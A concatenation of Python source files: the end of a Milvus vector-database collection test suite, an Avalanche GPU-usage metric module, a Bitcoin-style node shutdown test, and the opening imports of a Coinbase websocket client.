assert not status.OK()
@pytest.mark.level(2)
def test_create_collection_existed_ip(self, connect):
'''
target: test create collection but the collection name have already existed
method: create collection with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_None(self, connect):
'''
target: test create collection but the collection name is None
method: create collection, param collection_name is None
expected: create raise error
'''
param = {'collection_name': None,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_dimension(self, connect):
'''
target: test create collection with no dimension params
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_file_size(self, connect):
'''
target: test create collection with no index_file_size params
method: create collection with corrent params
expected: create status return ok, use default 1024
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
logging.getLogger().info(status)
status, result = connect.get_collection_info(collection_name)
logging.getLogger().info(result)
assert result.index_file_size == 1024
def test_create_collection_no_metric_type(self, connect):
'''
target: test create collection with no metric_type params
method: create collection with corrent params
expected: create status return ok, use default L2
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
status = connect.create_collection(param)
status, result = connect.get_collection_info(collection_name)
logging.getLogger().info(result)
assert result.metric_type == MetricType.L2
"""
******************************************************************
The following cases are used to test `get_collection_info` function
******************************************************************
"""
def test_collection_describe_result(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.L2
@pytest.mark.level(2)
def test_collection_get_collection_info_name_ip(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.IP
@pytest.mark.level(2)
def test_collection_get_collection_info_name_jaccard(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.JACCARD
@pytest.mark.level(2)
def test_collection_get_collection_info_name_hamming(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.HAMMING
def test_collection_get_collection_info_name_substructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUBSTRUCTURE
def test_collection_get_collection_info_name_superstructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUPERSTRUCTURE
# TODO: enable
@pytest.mark.level(2)
def _test_collection_get_collection_info_name_multiprocessing(self, connect, args):
'''
target: test describe collection created with multiprocess
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def describecollection(milvus):
status, res = milvus.get_collection_info(collection_name)
assert res.collection_name == collection_name
process_num = 4
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=describecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# @pytest.mark.level(2)
# def test_collection_describe_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.get_collection_info(collection)
def test_collection_describe_dimension(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the dimention value returned by describe method
expected: dimention equals with dimention when created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim+1,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.dimension == dim+1
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
def test_drop_collection(self, connect, collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(collection)
assert not assert_has_collection(connect, collection)
@pytest.mark.level(2)
def test_drop_collection_ip(self, connect, ip_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ip_collection)
assert not assert_has_collection(connect, ip_collection)
@pytest.mark.level(2)
def test_drop_collection_jaccard(self, connect, jac_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(jac_collection)
assert not assert_has_collection(connect, jac_collection)
@pytest.mark.level(2)
def test_drop_collection_hamming(self, connect, ham_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ham_collection)
assert not assert_has_collection(connect, ham_collection)
# @pytest.mark.level(2)
# def test_collection_delete_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_collection(collection)
def test_drop_collection_not_existed(self, connect):
'''
target: test delete collection not in index
method: delete all collections, and delete collection again,
assert the value returned by delete method
expected: status not ok
'''
collection_name = gen_unique_str("test_collection")
status = connect.drop_collection(collection_name)
assert not status.OK()
def test_delete_create_collection_repeatedly(self, connect):
'''
target: test delete and create the same collection repeatedly
method: try to create the same collection and delete repeatedly,
assert the value returned by delete method
expected: create ok and delete ok
'''
loops = 2
timeout = 5
for i in range(loops):
collection_name = "test_collection"
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status = None
while i < timeout:
status = connect.drop_collection(collection_name)
time.sleep(1)
i += 1
if status.OK():
break
if i > timeout:
assert False
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing(self, args):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 6
processes = []
def deletecollection(milvus):
status = milvus.drop_collection(collection)
# assert not status.code==0
assert assert_has_collection(milvus, collection)
assert status.OK()
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=deletecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing_multicollection(self, connect):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 5
loop_num = 2
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_drop_collection_with_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
j = j + 1
def delete(connect,ids):
i = 0
while i < loop_num:
status = connect.drop_collection(collection[ids*process_num+i])
time.sleep(2)
assert status.OK()
assert not assert_has_collection(connect, collection[ids*process_num+i])
i = i + 1
for i in range(process_num):
ids = i
p = Process(target=delete, args=(connect,ids))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
def test_has_collection(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_ip(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_jaccard(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_hamming(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
# @pytest.mark.level(2)
# def test_has_collection_without_connection(self, collection, dis_connect):
# '''
# target: test has collection, without connection
# method: calling has collection with correct params, with a disconnected instance
# expected: has collection raise exception
# '''
# with pytest.raises(Exception) as e:
# assert_has_collection(dis_connect, collection)
def test_has_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, which not existed in db,
assert the value returned by has_collection method
expected: False
'''
collection_name = gen_unique_str("test_collection")
assert not assert_has_collection(connect, collection_name)
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
def test_list_collections(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_ip(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_jaccard(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_hamming(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_substructure(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_superstructure(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
# @pytest.mark.level(2)
# def test_list_collections_without_connection(self, dis_connect):
# '''
# target: test list_collections, without connection
# method: calling list_collections with correct params, with a disconnected instance
# expected: list_collections raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.list_collections()
@pytest.mark.level(2)
def test_list_collections_no_collection(self, connect):
'''
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
'''
status, result = connect.list_collections()
if result:
for collection_name in result:
connect.drop_collection(collection_name)
time.sleep(drop_collection_interval_time)
status, result = connect.list_collections()
assert status.OK()
assert len(result) == 0
# TODO: enable
@pytest.mark.level(2)
def _test_list_collections_multiprocessing(self, connect, args):
'''
target: test show collections is correct or not with processes
method: create collection, assert the value returned by list_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def showcollections(milvus):
status, result = milvus.list_collections()
assert status.OK()
assert collection_name in result
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=showcollections, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.mark.level(1)
def test_load_collection(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.load_collection(collection)
assert status.OK()
@pytest.mark.level(1)
def test_load_collection_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.load_collection(ip_collection)
assert status.OK()
@pytest.mark.level(1)
def test_load_collection_jaccard(self, connect, jac_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(jac_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
status = connect.load_collection(jac_collection)
assert status.OK()
@pytest.mark.level(1)
def test_load_collection_hamming(self, connect, ham_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(ham_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
status = connect.load_collection(ham_collection)
assert status.OK()
@pytest.mark.level(2)
def test_load_collection_not_existed(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.insert(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.load_collection(collection_name)
assert not status.OK()
@pytest.mark.level(2)
def test_load_collection_not_existed_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.insert(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.load_collection(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_load_collection_no_vectors(self, connect, collection):
status = connect.load_collection(collection)
assert status.OK()
@pytest.mark.level(2)
def test_load_collection_no_vectors_ip(self, connect, ip_collection):
status = connect.load_collection(ip_collection)
assert status.OK()
# TODO: psutils get memory usage
@pytest.mark.level(1)
def test_load_collection_memory_usage(self, connect, collection):
pass
class TestCollectionInvalid(object):
"""
Test creating collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_with_empty_collectionname(self, connect):
collection_name = ''
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_load_collection_with_invalid_collectionname(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
status = connect.load_collection(collection_name)
class TestCreateCollectionDimInvalid(object):
"""
Test creating collection with invalid dimension
"""
@pytest.fixture(
scope="function",
params=gen_invalid_dims()
)
def get_dim(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(5)
def test_create_collection_with_invalid_dimension(self, connect, get_dim):
dimension = get_dim
collection = gen_unique_str("test_create_collection_with_invalid_dimension")
param = {'collection_name': collection,
'dimension': dimension,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
if isinstance(dimension, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
# TODO: max / min index file size
class TestCreateCollectionIndexSizeInvalid(object):
"""
Test creating collections with invalid index_file_size
"""
@pytest.fixture(
scope="function",
params=gen_invalid_file_sizes()
)
def get_file_size(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_file_size):
file_size = get_file_size
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': file_size,
'metric_type': MetricType.L2}
if isinstance(file_size, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
class TestCreateMetricTypeInvalid(object):
"""
Test creating collections with invalid metric_type
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_metric_type):
metric_type = get_metric_type
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': 10,
'metric_type': metric_type}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def create_collection(connect, **params):
param = {'collection_name': params["collection_name"],
'dimension': params["dimension"],
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
return status
def search_collection(connect, **params):
status, result = connect.search(
params["collection_name"],
params["top_k"],
params["query_vectors"],
params={"nprobe": params["nprobe"]})
return status
def load_collection(connect, **params):
status = connect.load_collection(params["collection_name"])
return status
def has(connect, **params):
status, result = connect.has_collection(params["collection_name"])
return status
def show(connect, **params):
status, result = connect.list_collections()
return status
def delete(connect, **params):
status = connect.drop_collection(params["collection_name"])
return status
def describe(connect, **params):
status, result = connect.get_collection_info(params["collection_name"])
return status
def rowcount(connect, **params):
status, result = connect.count_entities(params["collection_name"])
return status
def create_index(connect, **params):
status = connect.create_index(params["collection_name"], params["index_type"], params["index_param"])
return status
func_map = {
# 0:has,
1:show,
10:create_collection,
11:describe,
12:rowcount,
13:search_collection,
14:load_collection,
15:create_index,
30:delete
}
def gen_sequence():
raw_seq = func_map.keys()
result = itertools.permutations(raw_seq)
for x in result:
yield x
class TestCollectionLogic(object):
@pytest.mark.parametrize("logic_seq", gen_sequence())
@pytest.mark.level(2)
def test_logic(self, connect, logic_seq, args):
if args["handler"] == "HTTP":
pytest.skip("Skip in http mode")
if self.is_right(logic_seq):
self.execute(logic_seq, connect)
else:
self.execute_with_error(logic_seq, connect)
def is_right(self, seq):
if sorted(seq) == seq:
return True
not_created = True
has_deleted = False
for i in range(len(seq)):
if seq[i] > 10 and not_created:
return False
elif seq [i] > 10 and has_deleted:
return False
elif seq[i] == 10:
not_created = False
elif seq[i] == 30:
has_deleted = True
return True
def execute(self, logic_seq, connect):
basic_params = self.gen_params()
for i in range(len(logic_seq)):
# logging.getLogger().info(logic_seq[i])
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
assert status.OK()
def execute_with_error(self, logic_seq, connect):
basic_params = self.gen_params()
error_flag = False
for i in range(len(logic_seq)):
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
if not status.OK():
# logging.getLogger().info(logic_seq[i])
error_flag = True
break
assert error_flag == True
def gen_params(self):
collection_name = gen_unique_str("test_collection")
top_k = 1
vectors = gen_vectors(2, dim)
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2,
'nprobe': 1,
'top_k': top_k,
'index_type': IndexType.IVF_SQ8,
'index_param': {
'nlist': 16384
},
'query_vectors': vectors}
return param
|
gpu_usage.py
|
################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import GPUtil
from threading import Thread
import time
import warnings
from typing import Optional, TYPE_CHECKING, List
from avalanche.evaluation import Metric, PluginMetric, GenericPluginMetric
from avalanche.evaluation.metric_results import MetricResult
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxGPU(Metric[float]):
"""
The standalone GPU usage metric.
Important: this metric approximates the real maximum GPU percentage
usage since it sample at discrete amount of time the GPU values.
Instances of this metric keeps the maximum GPU usage percentage detected.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
The result, obtained using the `result` method, is the usage in mega-bytes.
The reset method will bring the metric to its initial state. By default
this metric in its initial state will return an usage value of 0.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the GPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
self.every = every
self.gpu_id = gpu_id
n_gpus = len(GPUtil.getGPUs())
if n_gpus == 0:
warnings.warn("Your system has no GPU!")
self.gpu_id = None
elif gpu_id < 0:
warnings.warn(
"GPU metric called with negative GPU id." "GPU logging disabled"
)
self.gpu_id = None
else:
if gpu_id >= n_gpus:
warnings.warn(f"GPU {gpu_id} not found. Using GPU 0.")
self.gpu_id = 0
self.thread = None
"""
Thread executing GPU monitoring code
"""
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max GPU usage.
"""
def _f(self):
"""
Until a stop signal is encountered,
this function monitors each `every` seconds
the maximum amount of GPU used by the process
"""
start_time = time.monotonic()
while not self.stop_f:
# GPU percentage
gpu_perc = GPUtil.getGPUs()[self.gpu_id].load * 100
if gpu_perc > self.max_usage:
self.max_usage = gpu_perc
time.sleep(
self.every - ((time.monotonic() - start_time) % self.every)
)
def start_thread(self):
if self.gpu_id is not None:
assert not self.thread, (
"Trying to start thread " "without joining the previous."
)
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def result(self) -> Optional[float]:
"""
Returns the max GPU percentage value.
:return: The percentage GPU usage as a float value in range [0, 1].
"""
return self.max_usage
def update(self):
pass
class GPUPluginMetric(GenericPluginMetric[float]):
def __init__(self, gpu_id, every, reset_at, emit_at, mode):
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
super(GPUPluginMetric, self).__init__(
self._gpu, reset_at=reset_at, emit_at=emit_at, mode=mode
)
def update(self, strategy):
self._gpu.update()
class MinibatchMaxGPU(GPUPluginMetric):
"""
The Minibatch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Minibatch Max GPU metric
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super(MinibatchMaxGPU, self).__init__(
gpu_id,
every,
reset_at="iteration",
emit_at="iteration",
mode="train",
)
def before_training(self, strategy: "BaseStrategy") -> None:
super().before_training(strategy)
self._gpu.start_thread()
def after_training(self, strategy: "BaseStrategy") -> None:
super().before_training(strategy)
self._gpu.stop_thread()
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_MB"
class EpochMaxGPU(GPUPluginMetric):
"""
The Epoch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the epoch Max GPU metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super(EpochMaxGPU, self).__init__(
gpu_id, every, reset_at="epoch", emit_at="epoch", mode="train"
)
def before_training(self, strategy: "BaseStrategy"):
super().before_training(strategy)
self._gpu.start_thread()
def after_training(self, strategy: "BaseStrategy") -> None:
self._gpu.stop_thread()
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Epoch"
class ExperienceMaxGPU(GPUPluginMetric):
"""
The Experience Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Experience CPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super(ExperienceMaxGPU, self).__init__(
gpu_id,
every,
reset_at="experience",
emit_at="experience",
mode="eval",
)
def before_eval(self, strategy: "BaseStrategy"):
super().before_eval(strategy)
self._gpu.start_thread()
def after_eval(self, strategy: "BaseStrategy"):
super().after_eval(strategy)
self._gpu.stop_thread()
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Experience"
class StreamMaxGPU(GPUPluginMetric):
"""
The Stream Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Experience CPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super(StreamMaxGPU, self).__init__(
gpu_id, every, reset_at="stream", emit_at="stream", mode="eval"
)
def before_eval(self, strategy):
super().before_eval(strategy)
self._gpu.start_thread()
def after_eval(self, strategy: "BaseStrategy") -> MetricResult:
packed = super().after_eval(strategy)
self._gpu.stop_thread()
return packed
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Stream"
def gpu_usage_metrics(
gpu_id,
every=0.5,
minibatch=False,
epoch=False,
experience=False,
stream=False,
) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
:param minibatch: If True, will return a metric able to log the minibatch
max GPU usage.
:param epoch: If True, will return a metric able to log the epoch
max GPU usage.
:param experience: If True, will return a metric able to log the experience
max GPU usage.
:param stream: If True, will return a metric able to log the evaluation
max stream GPU usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxGPU(gpu_id, every))
if epoch:
metrics.append(EpochMaxGPU(gpu_id, every))
if experience:
metrics.append(ExperienceMaxGPU(gpu_id, every))
if stream:
metrics.append(StreamMaxGPU(gpu_id, every))
return metrics
__all__ = [
"MaxGPU",
"MinibatchMaxGPU",
"EpochMaxGPU",
"ExperienceMaxGPU",
"StreamMaxGPU",
"gpu_usage_metrics",
]
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Cruro Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test bitcoind shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
websocket_client.py
|
# cbpro/WebsocketClient.py
# original author: Daniel Paquin
# mongo "support" added by Drew Rice
#
#
# Template object to receive messages from the Coinbase Websocket Feed
from __future__ import print_function
import json
import base64
import hmac
